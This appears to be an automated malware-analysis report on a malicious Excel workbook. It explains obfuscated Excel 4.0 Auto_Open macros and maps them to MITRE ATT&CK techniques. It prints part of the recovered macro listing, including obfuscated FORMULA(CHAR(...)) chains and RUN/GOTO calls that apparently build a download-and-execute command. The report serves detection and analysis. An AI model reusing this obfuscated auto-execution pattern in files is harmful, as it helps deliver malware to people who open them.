MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains obfuscated Excel 4.0 macros with an Auto_Open entry, indicating an attempt to automatically execute malicious code upon opening. The macro uses a chain of FORMULA(CHAR(...)) calls, which are likely deobfuscating and constructing a command to download and execute a second-stage payload. This is a common technique for delivering malware via spearphishing attachments.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAINExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 128363 bytes |
SHA-256: 3e520cf0ded7de8b320d3869531b0ae013f92541d0cfb62936b35d621244d447 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!BM47333 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,JJ12,"",-102.80007812499999886313 ' Sheet,FI13,"",5.20000000000000284217 ' Sheet,FQ60,"",599.00000000000000000000 ' Sheet,BO62,"",0.22969187675070026899 ' Sheet,EG169,"",-286.00000000000000000000 ' Sheet,BB219,"",72.20003906249999658939 ' Sheet,GR261,"",-296.00000000000000000000 ' Sheet,GQ320,"FORMULA(CHAR(HN46867/JD49200)&CHAR(CR58+Z41488)&CHAR(BH64677/BG61733)&CHAR(FT19596/EX4713)&CHAR(ED24133/CB59942)&CHAR(HN46867-HD37043)&CHAR(ED24133*GU39413)&CHAR(ED6170*FX38233)&CHAR(C9513*FN8569)&CHAR(BH64677/ED27021)&CHAR(BH64677-FL40031)&CHAR(HN46867-IG63948)&CHAR(BH64677+K59585)&CHAR(EB12489+EK49194)&CHAR(FX28698/H62576)&CHAR(FX28698-EI28477)&CHAR(C9513/GQ10202)&CHAR(ED24133*FN16611)&CHAR(FX28698-BQ51983)&CHAR(EB12489/EY65017)&CHAR(CR58+FF1242)&CHAR(BH64677-EN5337)&CHAR(FX28698-JF52373)&CHAR(EB12489*GL32475)&CHAR(C9513-II47648)&CHAR(HN46867-GE30195)&CHAR(CR58+GV40384)&CHAR(A47290-CN5194)&CHAR(BH64677-DN47107)&CHAR(FX28698+BU19856)&CHAR(C9513+IZ25975)&CHAR(CR58*HE51616)&CHAR(FX28698-IO18415)&CHAR(CR58-GG2713)&CHAR(CR58-GM20944)&CHAR(ED24133-FE22951)&CHAR(BH64677+DG43649)&CHAR(CR58+DR49961)&CHAR(FT19596*JF27331)&CHAR(HN46867*DO62665)&CHAR(A47290-EW62389)&CHAR(BH64677/Z45671)&CHAR(BH64677/JF9769)&CHAR(A47290/BT21397)&CHAR(BH64677+FQ60)&CHAR(ED24133/HL40737)&CHAR(CR58/DQ47472)&CHAR(FT19596+GG18398),GQ321)","" ' Sheet,GQ322,RUN(DA40755),"" ' Sheet,HM329,GOTO(DV64726),"" ' Sheet,HZ342,"",7.30000488281249992895 ' Sheet,JR347,"",-13.10000000000000142109 ' Sheet,DO358,"",-22.20000000000000284217 ' Sheet,EP361,"",5.28985507246376851498 ' Sheet,HS361,"",0.22739726027397261232 ' Sheet,IE370,"",0.38403041825095057815 ' Sheet,CZ385,"",308.00000000000000000000 ' Sheet,CL399,"",865.00000000000000000000 ' Sheet,BL443,"",-395.00000000000000000000 ' Sheet,GZ450,"",-0.08424908424908425508 ' Sheet,DK479,"",300.00000000000000000000 ' Sheet,DC488,"",495.00000000000000000000 ' Sheet,EW512,"",1.82795698924731175872 ' Sheet,BP547,"",0.22465753424657533555 ' Sheet,M562,"",-863.00000000000000000000 ' Sheet,FH575,"",2.39090809090909095502 ' Sheet,BQ584,"",0.92469879518072284341 ' Sheet,FM622,"",22.20000000000000284217 ' Sheet,EM704,"",305.00000000000000000000 ' Sheet,GZ725,"",550.00000000000000000000 ' Sheet,D809,"",0.19444444444444444753 ' Sheet,DS819,"",270.00000000000000000000 ' Sheet,HI834,"",874.00000000000000000000 ' Sheet,FU866,"",0.28291316526610643667 ' Sheet,R872,"",-6.75000000000000000000 ' Sheet,FG897,"",4.33734939759036119966 ' Sheet,FX985,"",-22.20000000000000284217 ' Sheet,EV990,"",0.31932873109243692378 ' Sheet,BG1034,"",0.12777777777777776791 ' Sheet,IH1108,"",6.86538461538461497469 ' Sheet,BI1162,"",-321.00000000000000000000 ' Sheet,FF1242,"",468.00000000000000000000 ' Sheet,IG1247,"",-528.00000000000000000000 ' Sheet,BE1282,"",3.92307692307692290612 ' Sheet,CE1304,"",115.00000000000000000000 ' Sheet,DJ1315,"",-4.41584058415841607115 ' Sheet,CA1322,"",-380.00000000000000000000 ' Sheet,BI1343,"",291.00000000000000000000 ' Sheet,JJ1536,"FORMULA(CHAR(ED24133-DM64451)&CHAR(ED6170/CK58427)&CHAR(EB12489/JO54439)&CHAR(A47290-DN31722)&CHAR(EB12489*EQ59815)&CHAR(ED6170/BQ56821)&CHAR(ED6170*CP54933)&CHAR(C9513+GR261)&CHAR(HN46867-X2795)&CHAR(FX28698-BI1343)&CHAR(ED6170+HC41456)&CHAR(EB12489*EB37884)&CHAR(ED6170+DH58098)&CHAR(HN46867+CN13179)&CHAR(FX28698+JB20830)&CHAR(FT19596+GO43971)&CHAR(FT19596-DW11056)&CHAR(BH64677+IC54372)&CHAR(HN46867/JP24457)&CHAR(C9513/II11704)&CHAR(A47290/HY24307)&CHAR(FT19596*IJ51112)&CHAR(C9513-DH63589)&CHAR(ED24133*JQ63983)&CHAR(FT19596-GG15048)&CHAR(ED24133*GS48060)&CHAR(BH64677/DQ2 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.